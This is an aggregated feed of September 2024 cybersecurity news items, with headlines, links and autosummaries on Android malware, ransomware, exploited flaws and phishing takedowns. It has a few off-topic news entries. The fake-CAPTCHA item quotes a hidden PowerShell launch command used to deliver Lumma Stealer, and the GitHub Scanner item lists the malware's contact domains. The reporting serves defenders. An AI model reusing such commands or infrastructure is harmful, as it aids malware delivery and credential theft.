        2024-09-24 https://thehackernews.com/2024/09/necro-android-malware-found-in-popular.html
        Altered versions of legitimate Android apps associated with Spotify, WhatsApp, and Minecraft have been used to deliver a new version of a known malware loader called Necro. Kaspersky said some of the malicious apps have also been found on the Google Play Store. They have been cumulatively downloaded 11 million times. They include - Wuta Camera - Nice Shot Always (com.benqu.wuta) - 10+ million

        Autosummary: Necro's malicious functions are realized through a set of additional modules (aka plugins) that are downloaded from the command-and-control (C2) server, allowing it to perform a wide range of actions on the infected Android device: NProxy (create a tunnel through the victim's device); island (generate a pseudo-random number that's used as a time interval, in milliseconds, between displays of intrusive ads); web (periodically contact a C2 server and execute arbitrary code with elevated permissions when loading specific links); Cube SDK (a helper module that loads other plugins to handle ads in the background); Tap (download arbitrary JavaScript code and a WebView interface from the C2 server that are responsible for covertly loading and viewing ads); Happy SDK/Jar SDK (a module that combines the NProxy and web modules with some minor differences). The discovery of Happy SDK has raised the possibility that the threat actors behind the campaign are experimenting with a non-modular version as well.


        A cyberattack on MoneyGram caused its service outage

        financial ciber
        2024-09-24 https://securityaffairs.com/168827/security/moneygram-outage-caused-by-cyberattack.html
        American peer-to-peer payments and money transfer company MoneyGram confirmed that a cyberattack caused its service outage. American interstate and international peer-to-peer payments and money transfer company MoneyGram confirmed that its services are currently unavailable due to a cyberattack. On September 22, the company informed its customers that it was experiencing a network outage impacting connectivity to a number of our systems. The […]

        Autosummary: Pierluigi Paganini, September 24, 2024: American peer-to-peer payments and money transfer company MoneyGram confirmed that a cyberattack caused its service outage.


        AutoCanada says ransomware attack "may" impact employee data

        exploits ransomware
        2024-09-24 https://www.bleepingcomputer.com/news/security/autocanada-says-ransomware-attack-may-impact-employee-data/
        AutoCanada is warning that employee data may have been exposed in an August cyberattack claimed by the Hunters International ransomware gang. [...]

        Autosummary: The data that has been exposed includes: full name; address; date of birth; payroll information, including salaries and bonuses; social insurance number; bank account number used for direct deposits; scans of government-issued identification documents; and any personal documents stored on a work computer or drives tied to a work computer. Those impacted will receive three years of free identity theft protection and credit monitoring coverage through Equifax, with the enrollment deadline set to January 31, 2025.


        Kansas water plant cyberattack forces switch to manual operations

        ciber
        2024-09-24 https://www.bleepingcomputer.com/news/security/kansas-water-plant-cyberattack-forces-switch-to-manual-operations/
        Arkansas City, a small city in Cowley County, Kansas, was forced to switch its water treatment facility to manual operations over the weekend to contain a cyberattack detected on Sunday morning. [...]

        Autosummary: U.S. Water and Wastewater Systems (WWS) Sector facilities have also been breached multiple times over the last decade in Ghost, ZuCaNo, and Makop ransomware attacks that impacted a South Houston wastewater treatment plant in 2011, a water company with outdated software and hardware equipment in 2016, the Southern California Camrosa Water District in August 2020, and a Pennsylvania water system in May 2021.


        A generative artificial intelligence malware used in phishing attacks

        financial exploits
        2024-09-24 https://securityaffairs.com/168840/malware/generative-artificial-intelligence-malware.html
        HP researchers detected a dropper that was generated by generative artificial intelligence services and used to deliver AsyncRAT malware. While investigating a malicious email, HP researchers discovered malware generated by generative artificial intelligence services and used to deliver the AsyncRAT malware. The AI-generated malware was discovered in June 2024; the phishing message used an invoice-themed lure […]

        Autosummary: Pierluigi Paganini, September 24, 2024: HP researchers detected a dropper that was generated by generative artificial intelligence services and used to deliver AsyncRAT malware.


        Chinese Hackers Exploit GeoServer Flaw to Target APAC Nations with EAGLEDOOR Malware

        exploits
        2024-09-23 https://thehackernews.com/2024/09/chinese-hackers-exploit-geoserver-flaw.html
        A suspected advanced persistent threat (APT) originating from China targeted a government organization in Taiwan, and possibly other countries in the Asia-Pacific (APAC) region, by exploiting a recently patched critical security flaw impacting OSGeo GeoServer GeoTools. The intrusion activity, which was detected by Trend Micro in July 2024, has been attributed to a threat actor dubbed Earth Baxia



        Hacktivist group Twelve is back and targets Russian entities

        rusia-ucrania
        2024-09-23 https://securityaffairs.com/168746/hacking/twelve-group-targets-russian-entities.html
        Hacktivist group Twelve is back and targets Russian entities to destroy critical assets and disrupt their operations. The hacktivist group Twelve has been active since at least April 2023; it was formed in the wake of the conflict between Russia and Ukraine. The threat actor focuses on destroying critical assets, disrupting target business, and stealing […]

        Autosummary: Some of the tools used by the group are Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner and PsExec.


        Street battles in Bolivia as Evo Morales leads march to capital

        latam
        2024-09-23 https://www.bbc.com/news/articles/cx24ed766lpo
        Supporters of Evo Morales have clashed with followers of his rival ahead of the 2025 election.



        New PondRAT Malware Hidden in Python Packages Targets Software Developers

        exploits
        2024-09-23 https://thehackernews.com/2024/09/new-pondrat-malware-hidden-in-python.html
        Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign. PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been previously attributed to the Lazarus Group and deployed in

        Autosummary: The list of malicious packages, now removed from the PyPI repository, is below - The infection chain is fairly simple in that the packages, once downloaded and installed on developer systems, are engineered to execute an encoded next-stage that, in turn, runs the Linux and macOS versions of the RAT malware after retrieving them from a remote server.


        Chinese APT Earth Baxia target APAC by exploiting GeoServer flaw

        exploits
        2024-09-23 https://securityaffairs.com/168767/apt/earth-baxia-apt-targets-apac-geotools-flaw.html
        Suspected China-linked APT Earth Baxia targeted a government organization in Taiwan by exploiting a recently patched OSGeo GeoServer GeoTools flaw. Trend Micro researchers reported that China-linked APT group Earth Baxia has targeted a government organization in Taiwan and potentially other countries in the Asia-Pacific (APAC) region. The threat actor used spear-phishing emails and exploited the […]

        Autosummary: Earth Baxia primarily targeted government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand. The malicious code supports methods like getFile, getUpdates, sendDocument, and sendMessage to gather information, transfer files, and execute payloads.


        Organizations are changing cybersecurity providers in wake of Crowdstrike outage

        ciber
        2024-09-23 https://www.helpnetsecurity.com/2024/09/23/changing-cybersecurity-providers/

        More often than not, a cyber attack or a cyber incident that results in business disruption will spur organizations to make changes to improve their cybersecurity and cyber resilience – and sometimes that means changing cybersecurity providers. The recent massive worldwide outage caused by a faulty Crowdstrike sensor content update has had a similar effect on many German organizations, a recent report by the German Federal Office for Information Security (BSI) and Germany’s digital association … More


        Autosummary: Increasing network segmentation (49%); building redundancies in IT (48%); implementation of zero-trust architecture (39%); increased use of cloud services (35%); implementation of offline fallback solutions (31%); review/adjustment of service level agreements (31%), etc. Interestingly enough, even though two-thirds (64%) of the polled organizations think that an incident like the CrowdStrike outage cannot be completely prevented, 30% have or are planning to diversify IT security solutions they use.


        THN Cybersecurity Recap: Last Week’s Top Threats and Trends (September 16-22)

        ciber
        2024-09-23 https://thehackernews.com/2024/09/thn-cybersecurity-recap-last-weeks-top.html
        Hold on tight, folks, because last week’s cybersecurity landscape was a rollercoaster! We witnessed everything from North Korean hackers dangling "dream jobs" to expose a new malware, to a surprising twist in the Apple vs. NSO Group saga. Even the seemingly mundane world of domain names and cloud configurations had its share of drama. Let’s dive into the details and see what lessons we can glean "

        Autosummary: Targets of the campaigns include entities in South Korea and the U.S. 📰 Around the Cyber World Sandvine Leaves 56 "Non-democratic" Countries: Sandvine, the company behind middleboxes that have facilitated the delivery of commercial spyware as part of highly-targeted attacks, said it has exited 32 countries and is in process of ceasing operations in another 24 countries, citing elevated threats to digital rights. 🔥 Cybersecurity Resources & Insights — Upcoming Webinars Zero Trust: Anti-Ransomware Armor: Join our next webinar with Zscaler’s Emily Laufer for a deep dive into the 2024 Ransomware Report, uncovering the latest trends, emerging threats, and the zero-trust strategies that can safeguard your organization. The botnet consisted of over 260,000 devices in June 2024, with victims scattered across North America, Europe, Asia, Africa, Oceania, and South America. "The misuse of deep packet inspection technology is an international problem that threatens free and fair elections, basic human rights, and other digital freedoms we believe are inalienable," it said. "


        Critical Flaw in Microchip ASF Exposes IoT Devices to Remote Code Execution Risk

        industry
        2024-09-23 https://thehackernews.com/2024/09/critical-flaw-in-microchip-asf-exposes.html
        A critical security flaw has been disclosed in the Microchip Advanced Software Framework (ASF) that, if successfully exploited, could lead to remote code execution. The vulnerability, tracked as CVE-2024-7490, carries a CVSS score of 9.5 out of a maximum of 10.0. It has been described as a stack-based overflow vulnerability in ASF’s implementation of the tinydhcp server stemming from a lack of "

        Autosummary: "


        Android malware "Necro" infects 11 million devices via Google Play

        exploits
        2024-09-23 https://www.bleepingcomputer.com/news/security/android-malware-necro-infects-11-million-devices-via-google-play/
        A new version of the Necro malware loader for Android was installed on 11 million devices through Google Play in malicious SDK supply chain attacks. [...] "

        Autosummary: Necro installs several payloads to infected devices and activates various malicious plugins, including: adware that loads links through invisible WebView windows (Island plugin, Cube SDK); modules that download and execute arbitrary JavaScript and DEX files (Happy SDK, Jar SDK); tools specifically designed to facilitate subscription fraud (Web plugin, Happy SDK, Tap plugin); mechanisms that use infected devices as proxies to route malicious traffic (NProxy plugin). Necro Trojan on Google Play: Kaspersky discovered the presence of the Necro loader in two apps on Google Play, both of which have a substantial userbase. "


        San Francisco’s fight against deepfake porn, with City Attorney David Chiu (Lock and Code S05E20)

        government
        2024-09-23 https://www.malwarebytes.com/blog/podcast/2024/09/san-franciscos-fight-against-deepfake-porn-with-city-attorney-david-chiu-lock-and-code-s05e20
        This week on the Lock and Code podcast, we speak with San Francisco City Attorney David Chiu about his team’s fight against deepfake porn. "

        Autosummary: But very soon into the technology’s debut, it began being used to create pornographic images of actresses, celebrities, and, more recently, everyday high schoolers and college students. "


        New Mallox ransomware Linux variant based on leaked Kryptina code

        exploits ransomware Linux
        2024-09-23 https://www.bleepingcomputer.com/news/security/new-mallox-ransomware-linux-variant-based-on-leaked-kryptina-code/
        An affiliate of the Mallox ransomware operation, also known as TargetCompany, was spotted using a slightly modified version of the Kryptina ransomware to attack Linux systems. [...] "

        Autosummary: "


        Cybersecurity and compliance: The dynamic duo of 2024

        ciber
        2024-09-23 https://grahamcluley.com/feed-sponsor-manageengine/
        Graham Cluley Security News is sponsored this week by the folks at ManageEngine. Thanks to the great team there for their support! It’s almost the end of 2024, and one thing is clear: cybersecurity and compliance are no longer optional; they’re inseparable pillars of survival. This year has seen some of the most severe cyber … Continue reading "Cybersecurity and compliance: The dynamic duo of 2024" "

        Autosummary: By automating patches, detecting vulnerabilities, and managing configurations, it ensures that your endpoints – the most vulnerable entry points for attackers – are fortified, compliant, and resilient. Learn firsthand from industry experts about real-world breaches, the financial havoc they wreaked, and, most importantly, how they could have been avoided. Enter ManageEngine: Your Cybersecurity and Compliance Savior. In the midst of this chaos, ManageEngine has proven itself as a trusted partner for organizations grappling with the twin challenges of compliance and cybersecurity. "


        Week in review: Critical VMware vCenter Server bugs fixed, Apple releases iOS 18

        exploits
        2024-09-22 https://www.helpnetsecurity.com/2024/09/22/week-in-review-critical-vmware-vcenter-server-bugs-fixed-apple-releases-ios-18/

        Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Critical VMware vCenter Server bugs fixed (CVE-2024-38812) Broadcom has released fixes for two vulnerabilities affecting VMware vCenter Server that can be triggered by sending a specially crafted network packet, and could lead to remote code execution (CVE-2024-38812) or privilege escalation (CVE-2024-38813). Apple releases iOS 18, with security and privacy improvements Apple has launched iOS 18, the latest significant iteration of … More

        The post Week in review: Critical VMware vCenter Server bugs fixed, Apple releases iOS 18 appeared first on Help Net Security.

        "

        Autosummary: New infosec products of the week: September 20, 2024 Here’s a look at the most interesting products from the past week, featuring releases from anecdotes, F5 Networks, Gcore, Rapid7, Strivacity, and Veritas Technologies. Striking the balance between cybersecurity and operational efficiency In this Help Net Security interview, Michael Oberlaender, ex-CISO and book author, discusses how to strike the right balance between security and operational efficiency. "


        SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 12

        exploits
        2024-09-22 https://securityaffairs.com/168733/malware/security-affairs-malware-newsletter-round-12.html
        Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Protect Your Crypto: Understanding the Ongoing Global Malware Attacks and What We Are Doing to Stop Them   CISA warns of Windows flaw used in infostealer malware attacks Exotic SambaSpy is now dancing with Italian users   Loki: […] "

        Autosummary: "


        Ukraine bans Telegram for government agencies, military, and critical infrastructure

        government
        2024-09-21 https://securityaffairs.com/168674/cyber-warfare-2/ukraine-nccc-banned-telegram-military-government.html
        Ukraine’s NCCC banned the Telegram app for government agencies, military, and critical infrastructure, due to national security concerns. Ukraine’s National Coordination Centre for Cybersecurity (NCCC) has banned the Telegram messaging app on government agencies, military, and critical infrastructure, due to national security concerns. The ban does not affect Ukrainian citizens. On September 19, Ukraine announced […] "

        Autosummary: Ukraine bans Telegram for government agencies, military, and critical infrastructure Pierluigi Paganini September 21, 2024 Ukraine’s NCCC banned the Telegram app for government agencies, military, and critical infrastructure, due to national security concerns. "


        OP KAERB: Europol dismantled phishing scheme targeting mobile users

        financial
        2024-09-21 https://securityaffairs.com/168692/cyber-crime/op-kaerb-europol-dismantled-phishing-scheme.html
        A joint international law enforcement operation led by Europol dismantled a major phishing scheme targeting mobile users. Europol supported European and Latin American law enforcement agencies in dismantling an international criminal network that unlocks stolen or lost mobile phones using a phishing platform. The organization operated a phishing-as-a-service (PhaaS) platform called iServer, which had over […] "

        Autosummary: Europol dismantled phishing scheme targeting mobile users Pierluigi Paganini September 21, 2024 A joint international law enforcement operation led by Europol dismantled a major phishing scheme targeting mobile users. "


        Global infostealer malware operation targets crypto users, gamers

        exploits
        2024-09-21 https://www.bleepingcomputer.com/news/security/global-infostealer-malware-operation-targets-crypto-users-gamers/
        A massive infostealer malware operation encompassing thirty campaigns targeting a broad spectrum of demographics and system platforms has been uncovered, attributed to a cybercriminal group named "Marko Polo." [...] "

        Autosummary: The threat actors use a variety of distribution channels, including malvertising, spearphishing, and brand impersonation in online gaming, cryptocurrency, and software, to spread 50 malware payloads, including AMOS, Stealc, and Rhadamanthys. "


        Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks

        rusia-ucrania
        2024-09-21 https://thehackernews.com/2024/09/hacktivist-group-twelve-targets-russian.html
        A hacktivist group known as Twelve has been observed using an arsenal of publicly available tools to conduct destructive cyber attacks against Russian targets. "Rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims’ data and then destroy their infrastructure with a wiper to prevent recovery," Kaspersky said in a Friday analysis. "The approach is indicative of a "

        Autosummary: " Prominent among the other tools used by Twelve are Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation. "


        Ukraine Bans Telegram Use for Government and Military Personnel

        government
        2024-09-21 https://thehackernews.com/2024/09/ukraine-bans-telegram-use-for.html
        Ukraine has restricted the use of the Telegram messaging app by government officials, military personnel, and other defense and critical infrastructure workers, citing national security concerns. The ban was announced by the National Coordination Centre for Cybersecurity (NCCC) in a post shared on Facebook. "I have always advocated and advocate for freedom of speech, but the issue of Telegram is "

        Autosummary: "


        Argentina beat SA to keep Rugby Championship alive

        latam
        2024-09-21 https://www.bbc.com/sport/rugby-union/articles/cly798784kvo
        Argentina secure a dramatic win against South Africa to stop the world champions from winning the Rugby Championship title with a game to spare. "

        Autosummary: They are aiming to secure a first title win in the competition since 2019 and host second-placed Argentina, who have 14 points, in the final game for both teams next Saturday, 28 September. "


        Striking the balance between cybersecurity and operational efficiency

        ciber
        2024-09-20 https://www.helpnetsecurity.com/2024/09/20/michael-oberlaender-flexible-cybersecurity-strategy/

        In this Help Net Security interview, Michael Oberlaender, ex-CISO and book author, discusses how to strike the right balance between security and operational efficiency. Oberlaender advises companies starting their cybersecurity journey and stresses the importance of aligning with various frameworks. He also introduces his latest book, which provides insights into the CISO role and effective cybersecurity leadership. How do you balance the need for security with operational efficiency and flexibility in an organization’s cybersecurity strategy? … More

        The post Striking the balance between cybersecurity and operational efficiency appeared first on Help Net Security.

        "

        Autosummary: Establish your security operations center (SOC), perform consistent, immutable backups (on non-online systems), roll out some antimalware features, get your identity and access management (IAM) in order, build your fortress with firewalls, DMZs, zero trust networks, cloud security zones, develop your encryption vision, key management systems, activate the encryption and perform key rotation. ISO27XXX, NIST-800-XXX, NIST CSF, CIS, COBIT, COSO, ITIL, PCI, OWASP, plus a plethora of others, plus all the regulations. On the opposite side, the far right lane (truck lane, again, if not in left-hand traffic) is where security is overburdened (many controls, not all of them making sense, poor implementation, and slowing down all following traffic). "


        Critical Ivanti Cloud Appliance Vulnerability Exploited in Active Cyberattacks

        exploits ciber
        2024-09-20 https://thehackernews.com/2024/09/critical-ivanti-cloud-appliance.html
        Ivanti has revealed that a critical security flaw impacting Cloud Service Appliance (CSA) has come under active exploitation in the wild. The new vulnerability, assigned the CVE identifier CVE-2024-8963, carries a CVSS score of 9.4 out of a maximum of 10.0. It was "incidentally addressed" by the company as part of CSA 4.6 Patch 519 and CSA 5.0. "Path Traversal in the Ivanti CSA before 4.6 Patch "

        Autosummary: "


        The Vanilla Tempest cybercrime gang used INC ransomware for the first time in attacks on the healthcare sector

        exploits ransomware
        2024-09-20 https://securityaffairs.com/168633/uncategorized/vanilla-tempest-used-inc-ransomware.html
        Microsoft warns that financially motivated threat actor Vanilla Tempest is using INC ransomware in attacks aimed at the healthcare sector in the U.S. Microsoft Threat Intelligence team revealed that a financially motivated threat actor, tracked as Vanilla Tempest (formerly DEV-0832) is using the INC ransomware for the first time to target the U.S. healthcare sector. “Vanilla […] "

        Autosummary: "


        U.S. CISA adds new Ivanti Cloud Services Appliance Vulnerability to its Known Exploited Vulnerabilities catalog

        exploits
        2024-09-20 https://securityaffairs.com/168626/hacking/u-s-cisa-adds-ivanti-csa-flaw-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Cloud Services Appliance Vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Ivanti Cloud Services Appliance path traversal vulnerability, CVE-2024-8190 (CVSS score of 9.4), to its Known Exploited Vulnerabilities (KEV) catalog. Ivanti warned of a new Cloud Services Appliance […] "

        Autosummary: On September 13, 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added another Ivanti Cloud Services Appliance OS Command Injection Vulnerability, tracked as CVE-2024-8190 (CVSS score of 7.2), to its Known Exploited Vulnerabilities (KEV) catalog. "


        Dell investigates data breach claims after hacker leaks employee info

        financial
        2024-09-20 https://www.bleepingcomputer.com/news/security/dell-investigates-data-breach-claims-after-hacker-leaks-employee-info/
        Dell has confirmed to BleepingComputer that they are investigating recent claims that it suffered a data breach after a threat actor leaked the data for over 10,000 employees. [...] "

        Autosummary: "


        Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials

        financial
        2024-09-20 https://thehackernews.com/2024/09/europol-shuts-down-major-phishing.html
        Law enforcement authorities have announced the takedown of an international criminal network that leveraged a phishing platform to unlock stolen or lost mobile phones. The phishing-as-a-service (PhaaS) platform, called iServer, is estimated to have claimed more than 483,000 victims globally, led by Chile (77,000), Colombia (70,000), Ecuador (42,000), Peru (41,500), Spain (30,000), and Argentina "

        Autosummary: The phishing-as-a-service (PhaaS) platform, called iServer, is estimated to have claimed more than 483,000 victims globally, led by Chile (77,000), Colombia (70,000), Ecuador (42,000), Peru (41,500), Spain (30,000), and Argentina (29,000). iServer, per the Singapore-based company, offered a web interface that enabled low-skilled criminals, known as "unlockers," to siphon device passwords and user credentials from cloud-based mobile platforms, essentially permitting them to bypass Lost Mode and unlock the devices. "


        Disney ditching Slack after massive July data breach

        financial
        2024-09-20 https://www.bleepingcomputer.com/news/security/disney-ditching-slack-after-massive-july-data-breach/
        The Walt Disney Company is reportedly ditching Slack after a July data breach exposed over 1TB of confidential messages and files posted to the company’s internal communication channels. [...] "

        Autosummary: "


        Essential metrics for effective security program assessment

        industry
        2024-09-19 https://www.helpnetsecurity.com/2024/09/19/alex-spivakovsky-pentera-security-programs/

        In this Help Net Security interview, Alex Spivakovsky, VP of Research & Cybersecurity at Pentera, discusses essential metrics for evaluating the success of security programs. Spivakovsky explains how automation and proactive testing can reveal vulnerabilities and improve overall security posture. What are the most effective metrics for measuring the success of a security program? The most straightforward metric is: Has your organization been breached? If the answer is yes, it’s clear there’s work to be … More

        The post Essential metrics for effective security program assessment appeared first on Help Net Security.

        "

        Autosummary: The formula typically used is: ROSI = (Losses avoided – Cost of security measures) / Cost of security measures. For example, if a security program prevents $1 million in potential breach losses and costs $250,000 to implement, the ROSI would be 3, meaning a return of $3 for every $1 spent on security. Internal security teams tend to be small, relative to the overall organization, and cannot be everywhere; all employees need to understand how their actions can impact the overall organizational security posture and practice proper security hygiene. In this Help Net Security interview, Alex Spivakovsky, VP of Research & Cybersecurity at Pentera, discusses essential metrics for evaluating the success of security programs. This helps executive management and board members, who are typically more business-focused, and less familiar with cybersecurity concepts, to better understand the impact of security initiatives. "


        Clever "GitHub Scanner" campaign abusing repos to push malware

        exploits
        2024-09-19 https://www.bleepingcomputer.com/news/security/clever-github-scanner-campaign-abusing-repos-to-push-malware/
        A clever threat campaign is abusing GitHub repositories to distribute malware targeting users who frequent an open source project repository or are subscribed to email notifications from it. A malicious GitHub user opens a new "issue" on an open source repository falsely claiming that the project contains a "security vulnerability." [...] "

        Autosummary: When executed, the malware attempts to contact several suspicious domains, most of which are down at the time of writing: eemmbryequo.shop, keennylrwmqlw.shop, licenseodqwmqn.shop, reggwardssdqw.shop, relaxatinownio.shop, tendencctywop.shop, tesecuuweqo.shop, tryyudjasudqo.shop. BleepingComputer has confirmed that the malware is the Lumma Stealer information-stealing malware, used to steal credentials, authentication cookies, and browsing history from installed web browsers. "


        Forescout for OT Security secures OT, IoT, and IT hybrid environments

        industry
        2024-09-19 https://www.helpnetsecurity.com/2024/09/19/forescout-for-ot-security/

        Forescout announced its new SaaS Operational Technologies (OT) solution. Forescout for OT Security is a security solution that allows organizations to secure complex, heterogeneous OT, IoT/IoMT, and IT environments whether they are fully in cloud, completely air-gapped, or hybrid. Forescout for OT Security combines: Proactive security and exposure management Threat detection powered by Forescout Research – Vedere Labs’ proprietary threat research of unmanaged devices Critical operational monitoring Control across cloud and on-premises networks “The attack … More

        The post Forescout for OT Security secures OT, IoT, and IT hybrid environments appeared first on Help Net Security.

        "

        Autosummary: "


        Strivacity AI Assist optimizes digital identity management

        government
        2024-09-19 https://www.helpnetsecurity.com/2024/09/19/strivacity-ai-assist-simplifies-digital-identity-management/

        Strivacity released Strivacity AI Assist, a new “smart assistant” powered by GenAI that makes it easier to manage and secure digital identities across business-to-business (B2B) and business-to-consumer (B2C) use cases. Building on Strivacity’s machine learning capabilities for fraud detection, Strivacity AI Assist is the first GenAI capability embedded across a CIAM platform that provides real-time, contextual guidance throughout the customer journey – spanning customer experience, security, and compliance.  With AI Assist, digital experience leaders, security … More

        The post Strivacity AI Assist optimizes digital identity management appeared first on Help Net Security.

        "

        Autosummary: "


        Healthcare"s Diagnosis is Critical: The Cure is Cybersecurity Hygiene

        ciber
        2024-09-19 https://thehackernews.com/2024/09/healthcares-diagnosis-is-critical-cure.html
        Cybersecurity in healthcare has never been more urgent. As the most vulnerable industry and largest target for cybercriminals, healthcare is facing an increasing wave of cyberattacks. When a hospital’s systems are held hostage by ransomware, it’s not just data at risk — it’s the care of patients who depend on life-saving treatments. Imagine an attack that forces emergency care to halt, surgeries "

        Autosummary: Criminals target systems with vulnerabilities in basic areas, such as unpatched software, unsafe network services, and unencrypted web communications. These weaknesses provide easy entry points for attackers, allowing them to compromise critical systems and, ultimately, hold organizations hostage with ransomware. Cybercriminals target suppliers, partners, and other third-party entities that may have weaker cybersecurity defenses. Healthcare organizations must scrutinize their suppliers’ cybersecurity hygiene, ensuring they meet high standards of protection and continuously monitoring them for potential vulnerabilities. By assigning A to F cybersecurity hygiene ratings across multiple domains, including software patching, network filtering, and web encryption, RiskRecon helps organizations identify their vulnerabilities and prioritize areas for improvement. Healthcare accounted for 17.8% of all breach events and 18.2% of destructive ransomware events since 20121, surpassing other sectors like finance, government, and education. "


        Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector

        exploits ransomware
        2024-09-19 https://thehackernews.com/2024/09/microsoft-warns-of-new-inc-ransomware.html
        Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S. The tech giant’s threat intelligence team is tracking the activity under the name Vanilla Tempest (formerly DEV-0832). "Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, "

        Autosummary: "


        Antivirus firm Dr.Web disconnected all servers following a cyberattack

        ciber
        2024-09-19 https://securityaffairs.com/168577/hacking/antivirus-firm-dr-web-suffers-cyberattack.html
        Russian anti-virus firm Doctor Web (Dr.Web) disconnected all servers following a cyberattack over the weekend. This week, the Russian anti-malware firm Doctor Web (Dr.Web) announced that it had disconnected all servers following a cyberattack on Saturday, September 14. The company revealed it has detected “signs of unauthorised interference” to its IT infrastructure. The company pointed […] "

        Autosummary: Antivirus firm Dr.Web disconnected all servers following a cyberattack Pierluigi Paganini September 19, 2024 Russian anti-virus firm Doctor Web (Dr.Web) disconnected all servers following a cyberattack over the weekend. "


        Germany seizes 47 crypto exchanges used by ransomware gangs

        exploits ransomware
        2024-09-19 https://www.bleepingcomputer.com/news/security/germany-seizes-47-crypto-exchanges-used-by-ransomware-gangs/
        German law enforcement seized 47 cryptocurrency exchange services hosted in the country that facilitated illegal money laundering activities for cybercriminals, including ransomware gangs. [...] "

        Autosummary: "


        Windows users targeted with fake human verification pages delivering malware

        exploits
        2024-09-19 https://www.helpnetsecurity.com/2024/09/19/human-verification-pages-malware/

        For a while now, security researchers have been warning about fake human verification pages tricking Windows users into inadvertently installing malware. A recently exposed campaign showed how some users end up on these pages. Beware of fake human verification pages In late August 2024, Palo Alto Networks’ Unit 42 spotted seven CAPTCHA-style human verification pages that were not what they seemed. “These pages have a button that, when clicked, shows instructions for victims to paste … More

        The post Windows users targeted with fake human verification pages delivering malware appeared first on Help Net Security.

        "

        Autosummary: “Once the user pastes the PowerShell command into the Run dialog box, it will run PowerShell in a hidden window and execute the Base64-encoded command: powershell -w hidden -eC.” Once decoded, the command fetches the content from a text file hosted on the remote server, which contains additional commands to download the Lumma Stealer and executes them. "


        Hackers Exploit Default Credentials in FOUNDATION Software to Breach Construction Firms

        exploits
        2024-09-19 https://thehackernews.com/2024/09/hackers-exploit-default-credentials-in.html
        Threat actors have been observed targeting the construction sector by infiltrating the FOUNDATION Accounting Software, according to new findings from Huntress. "Attackers have been observed brute-forcing the software at scale, and gaining access simply by using the product’s default credentials," the cybersecurity company said. Targets of the emerging threat include plumbing, HVAC (heating, "

        Autosummary: "


        New Brazilian-Linked SambaSpy Malware Targets Italian Users via Phishing Emails

        financial exploits latam
        2024-09-19 https://thehackernews.com/2024/09/new-brazilian-linked-sambaspy-malware.html
        A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor. "Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country," Kaspersky said in a new analysis. "It’s likely that the attackers are testing the "

        Autosummary: A fully-featured remote access trojan developed in Java, SambaSpy is nothing short of a Swiss Army knife that can handle file system management, process management, remote desktop management, file upload/download, webcam control, keylogging and clipboard tracking, screenshot capture, and remote shell. "


        New TeamTNT Cryptojacking Campaign Targets CentOS Servers with Rootkit

        Linux
        2024-09-19 https://thehackernews.com/2024/09/new-teamtnt-cryptojacking-campaign.html
        The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system. "The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim’s assets, during which the threat actor uploaded a malicious script," Group-IB researchers Vito Alfano and Nam Le "

        Autosummary: "


        U.S. CISA adds Microsoft Windows, Apache HugeGraph-Server, Oracle JDeveloper, Oracle WebLogic Server, and Microsoft SQL Server bugs to its Known Exploited Vulnerabilities catalog

        exploits
        2024-09-19 https://securityaffairs.com/168592/security/u-s-cisa-windows-apache-hugegraph-oracle-jdeveloper-oracle-weblogic-sql-server-bugs-to-its-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Windows, Apache HugeGraph-Server, Oracle JDeveloper, Oracle WebLogic Server, and Microsoft SQL Server bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SonicWall SonicOS, ImageMagick and Linux Kernel vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these […] "

        Autosummary: Remote Code Execution Vulnerability; CVE-2019-1069 Microsoft Windows Task Scheduler Privilege Escalation Vulnerability; CVE-2022-21445 Oracle JDeveloper Remote Code Execution Vulnerability; CVE-2020-14644 Oracle WebLogic Server Remote Code Execution Vulnerability. The CVE-2022-21445 vulnerability (CVSS score of 9.8) is a remote code execution issue in the Oracle JDeveloper product of Oracle Fusion Middleware (component: ADF Faces). "


        Ivanti warns of another critical CSA flaw exploited in attacks

        exploits
        2024-09-19 https://www.bleepingcomputer.com/news/security/ivanti-warns-of-another-critical-csa-flaw-exploited-in-attacks/
        Today, Ivanti warned that threat actors are exploiting another Cloud Services Appliance (CSA) security flaw in attacks targeting a limited number of customers. [...] "

        Autosummary: Federal Civilian Executive Branch (FCEB) agencies must now patch vulnerable appliances within three weeks by October 4 and October 10, respectively, as required by Binding Operational Directive (BOD) 22-01. "


        CISA Adds One Known Exploited Vulnerability to Catalog

        exploits
        2024-09-19 https://www.cisa.gov/news-events/alerts/2024/09/19/cisa-adds-one-known-exploited-vulnerability-catalog

        CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

